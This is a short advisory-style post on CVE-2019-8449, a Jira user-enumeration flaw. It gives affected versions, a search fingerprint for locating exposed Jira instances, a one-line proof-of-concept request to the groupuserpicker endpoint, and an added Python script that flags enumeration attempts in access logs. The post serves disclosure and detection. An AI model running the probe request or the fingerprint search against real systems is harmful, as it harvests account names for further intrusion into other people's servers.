Atlassian Jira groupuserpicker User Information Enumeration Vulnerability CVE-2019-8449
Vulnerability Description
The Atlassian Jira groupuserpicker interface has a user information enumeration vulnerability. Through this vulnerability, an attacker can obtain user account names in the application and use them for further penetration.
Vulnerability Impact
Atlassian Jira <8.4.0
Network surveying and mapping
app="ATLASSIAN-JIRA"
Vulnerability Reproduction
Login page
Verify POC
/rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=false
When the user exists
When the user does not exist
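For defenders, requests to this endpoint can be reviewed in the web access log. The following is an added example, not part of the original post: it counts the distinct `query` values each client sent to groupuserpicker and flags clients at or above a threshold. The combined log format, the sample lines, the threshold of 3, and the matching of other API version segments and a context path prefix are assumptions; tune the threshold against normal picker use in your instance.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not from a real system.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2020:10:00:01 +0000] "GET /rest/api/latest/groupuserpicker?query=admin&maxResults=50&showAvatar=false HTTP/1.1" 200 512 "-" "curl/7.64"
203.0.113.7 - - [10/Jan/2020:10:00:02 +0000] "GET /rest/api/latest/groupuserpicker?query=root&maxResults=50&showAvatar=false HTTP/1.1" 200 98 "-" "curl/7.64"
203.0.113.7 - - [10/Jan/2020:10:00:03 +0000] "GET /jira/rest/api/2/groupuserpicker?query=j%2Esmith HTTP/1.1" 200 98 "-" "curl/7.64"
198.51.100.4 - - [10/Jan/2020:10:01:00 +0000] "GET /rest/api/latest/groupuserpicker?query=ali HTTP/1.1" 200 300 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2020:10:01:01 +0000] "GET /rest/api/latest/groupuserpicker?query=ali HTTP/1.1" 200 300 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2020:10:02:00 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Any API version segment and an optional context path prefix (assumption).
ENDPOINT_RE = re.compile(r'/rest/api/[^/]+/groupuserpicker/?$')

def picker_queries(log_text):
    """Map client address -> set of distinct `query` values sent to groupuserpicker."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, _method, target, _status = m.groups()
        url = urlsplit(target)
        if not ENDPOINT_RE.search(url.path):
            continue
        # parse_qs URL-decodes values, so encoded variants collapse together
        for value in parse_qs(url.query).get("query", []):
            seen[client].add(value.lower())
    return dict(seen)

def flag_enumeration(log_text, threshold=3):
    """Return clients that sent at least `threshold` distinct query values."""
    return sorted(c for c, names in picker_queries(log_text).items()
                  if len(names) >= threshold)

if __name__ == "__main__":
    for client in flag_enumeration(SAMPLE_LOG):
        print(client, sorted(picker_queries(SAMPLE_LOG)[client]))
```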
This post is licensed under CC BY 4.0 by the author.